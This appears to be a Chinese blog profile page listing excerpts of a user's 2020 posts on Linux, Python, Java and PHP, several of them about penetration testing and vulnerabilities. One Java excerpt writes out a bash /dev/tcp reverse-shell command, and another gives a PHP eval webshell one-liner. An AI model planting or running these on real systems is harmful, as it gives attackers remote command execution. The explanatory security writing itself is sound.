14 whatday

尚未进行身份认证

我要认证

暂无相关简介

等级
TA的排名 109

linux 查看 定时任务 crontab 日志记录

在Unix和类Unix的操作系统之中,crontab命令常用于设置周期性被执行的指令,也可以理解为设置定时任务。crontab中的定时任务有时候没有成功执行,什么原因呢?这时就需要去日志里去分析一下了,那该如何查看crontab的日志记录呢?1. linux看 /var/log/cron.log这个文件就可以,可以用 tail -f /var/log/cron.log 观察2. unix在 /var/spool/cron/tmp文件中,有croutXXX001864的tmp文件,tail

2020-07-03 17:05:47

java Runtime.getRuntime().exec 获取反弹shell

说明前面写了一篇在Java环境下获取shell的文章。当时使用的语句是: 123 Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"});p

2020-07-03 09:17:05

php file_put_contents() 与 file_get_contents() 函数用法

file_put_contentsfile_put_contents() 函数用于把字符串写入文件,成功返回写入到文件内数据的字节数,失败则返回 FALSE。语法:int file_put_contents ( string filename, string data [, int flags [, resource context]] )参数说明:参数说明filename要写入数据的文件名data要写入的数据。类型可以是 string,array(但不能为多维数组),或者是 stre...

2020-07-03 09:05:49

谷歌浏览器 chrome 查看当前页面cookie

方法一:首先,开启浏览器,输入要查看网址,再点网址列前方的图示,就可以就会看到Cookie。其次,点一下上图中显示的数字,进入后在允许的页面中,就会看到目前所储存的Cooke值有哪些。最后,当你要查看某个具体的cookie值,找到网址点一下,就可看到每个Cookie所记录的值与内容啦!方法二:键盘F12,找到network——点击Doc(如果没有数据,刷新一下界面),可以看到如下截图所示:有cookie等信息:...

2020-07-03 09:02:15

js base64编码解码 btoa atob 函数简介

window.atob(string):解码用来解码一个已经被base-64编码过的字符串。(参数string: 必需是一个通过 btoa() 方法编码的字符串)window.btoa(string):编码用来创建一个 base-64编码的字符串。示例://编码示例window.btoa('<script src="test.js"></script>'); 输出:"PHNjcmlwdCBzcmM9InRlc3QuanMiPjwvc2NyaXB0Pg=="/

2020-07-02 20:33:15

python3报错处理:UnicodeEncodeError: ‘ascii‘ codec can‘t encode characters in position 0-1

一、背景说明最开始不愿意使用Python,一大原因是因为Python2默认使用ASCII编码处理中文可以说是一件痛苦的事情。仅从更换默认编码一项变换,就可以说Python3和Python2不算同一门语言。Python3更换为默认使用Unicode(utf-8)编码,一直使用下来再没有遇到编码问题带来的困挠,似乎编码问题在Python3时代就该完全消失的。但这两天遇到了一个问题。在调用一个库时,出现了一个异常报错类似如UnicodeEncodeError: 'ascii' codec can't

2020-07-02 16:04:26

python时间差中 seconds 和 total_seconds 区别

import datetime t1 = datetime.datetime.strptime("2017-9-06 10:30:00", "%Y-%m-%d %H:%M:%S")t2 = datetime.datetime.strptime("2017-9-06 12:30:00", "%Y-%m-%d %H:%M:%S") interval_time = (t2 - t1).seconds # 输入的结果:7200 忽略微秒和天total_interval_time = (t2 - t1.

2020-07-02 15:18:16

java getRuntime().exec 带符号的命令 无法执行 解决方法

0x01 前言首先Java下的命令执行大家都知道常见的两种方式:1.使用ProcessBuilder 12 ProcessBuilder pb=new ProcessBuilder(cmd); pb.start(); 2.使用Runtime 1 Runtime.getRuntime().exec(cmd) 也就是说上面cmd参数可控的情况下,均存在命令执行的问题。但是话题回来,不太清楚大家是否

2020-07-02 13:31:36

渗透测试中的文件传输技巧

目录搭建 HTTP serverPythonPHP 5.4+RubyRuby 1.9.2+Perlbusybox httpdDownload files from HTTP serverWindowsLinuxSetup HTTP PUT server使用 Nginx 搭建 HTTP PUT Server使用 Python 搭建 HTTP PUT Server上传文件到 HTTP PUT serverLinuxWindows使用 Bash

2020-07-02 13:02:46

spring security oauth rce (cve-2016-4977) 漏洞分析

背景描述Spring Security OAuth 2016年以前有出一个CVE,这里写一个记录学习的东西。漏洞详细Spring Security OAuth官网有CVE-2016-4977的介绍,但是讲的不怎么清楚,就只是说了一下漏洞原理,我们就只知道是因为执行一个SpEL表达式https://pivotal.io/de/security/cve-2016-4977而产生的。看看利用的poc,大概了解一下整个过程。http://localhost:8080/oauth/authorize?resp

2020-07-02 12:35:02

ecshop 2.x/3.x sql注入/任意代码执行漏洞

影响版本:Ecshop 2.x Ecshop 3.x-3.6.0漏洞分析:该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...

2020-07-01 22:17:10

php 一句话木马简介

一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马工作原理<?php @eval($_POST['shell']);?>这是php的一句话后门中最普遍的一种。它的工作原理是:首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。实例:<?php @ev

2020-07-01 19:32:24

linux apt-get install 安装指定的版本

命令用法如下:apt-get install package=version例如我要安装autoconf 2.50:apt-get install autoconf=2.50列出一个软件的版本的命令是 apt-cache madison soft_name

2020-07-01 15:29:30

java rmi反序列化漏洞 简介

目录一、RMI简介二、RMI示例三、漏洞复现四、漏洞分析1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明?2、为什么不直接将badAttributeValueExpException对象bind到RMI服务?一、RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程.

2020-07-01 14:09:52

java 反序列化漏洞简介

目录一、Java的序列化与反序列化二、对java序列化的理解三、反序列化的漏洞原理概述四、关于反射链一、Java的序列化与反序列化在这里我们直接自己定义一个类,然后对这个类的对象(一个实例)进行序列化和发序列化测试。//引入必要的java包文件import java.io.*;//创建测试类,注意要继承Serializable接口class serialdemo implements Serializable{ public static int num..

2020-07-01 14:01:40

java 序列化与反序列化

一、什么是序列化与反序列化?Java 序列化是指把 Java 对象转换为字节序列的过程;Java 反序列化是指把字节序列恢复为 Java 对象的过程;二、为什么要用序列化与反序列化?在为什么要用序列化与反序列化之前我们先了解一下对象序列化的两种用途:把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中; 在网络上传送对象的字节序列。我们可以想想如果没有序列化之前,又是怎样一种情景呢?举例:Web 服务器中的 Session 会话对象,当有10万用户并发访问,就有可能..

2020-07-01 10:12:28

linux ssh 连接超时中断 解决方法

当在终端使用ssh命令连接到服务器时,如果一段时间没有活动连接会被中断一、修改ssh客户端配置编辑客户端 /etc/ssh/ssh_config (或~/.ssh/config 对当前用户生效) 文件,修改以下两个配置项(没有就自己添加)ServerAliveInterval 60 #ssh客户端每60秒会发送一个keepalive请求给服务端,服务端响应,从而保持连接;ServerAliveCountMax 3 #客户端发出请求后,服务器端没有响应达到3次,就自动断开连接。二、..

2020-06-30 21:32:23

python3 使用psutil 查看内存占用

有的时候需要对python程序内存占用进行监控,这个时候可以用到psutil库,Anaconda中是自带的,如果import出错,可以用pip install psutil(安装在python中)或conda install psutil(安装在Anaconda中)#常用的:import psutilimport osinfo = psutil.virtual_memory()print u'内存使用:',psutil.Process(os.getpid()).memory_info().

2020-06-29 20:10:24

linux 内存管理中的 rss 和 vsz

RSS 是常驻内存集(Resident Set Size),表示该进程分配的内存大小。RSS 不包括进入交换分区的内存。RSS 包括共享库占用的内存(只要共享库在内存中)RSS 包括所有分配的栈内存和堆内存。VSZ 表示进程分配的虚拟内存。VSZ 包括进程可以访问的所有内存,包括进入交换分区的内容,以及共享库占用的内存。如果一个进程,程序的大小有 500K,链接的共享库大小有 2500K,堆栈内存共有 200K,其中 100K 进入了交换分区。进程实际加载了共享库中的 1000K

2020-06-29 20:04:19

python3 监控指定进程 cpu和内存 使用率

为了测试某个服务的稳定性,通常需要在服务长时间运行的情况下,监控其资源消耗情况,比如cpu和内存使用这里借助python的psutil这个包可以很方便的监控指定进程号(PID)的cpu和内存使用情况代码process_monitor.pyimport sysimport timeimport psutil# get pid from argsif len(sys.argv) < 2: print ("missing pid arg") sys.exit()# get

2020-06-29 19:48:31

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 1024勋章
    1024勋章
    #1024程序员节#活动勋章,当日发布原创博客即可获得
  • 勤写标兵Lv4
    勤写标兵Lv4
    授予每个自然周发布9篇以上(包括9篇)原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。
  • 原力新人
    原力新人
    在《原力计划【第二季】》打卡挑战活动中,成功参与本活动并发布一篇原创文章的博主,即可获得此勋章。
  • 分享王者
    分享王者
    成功上传51个资源即可获取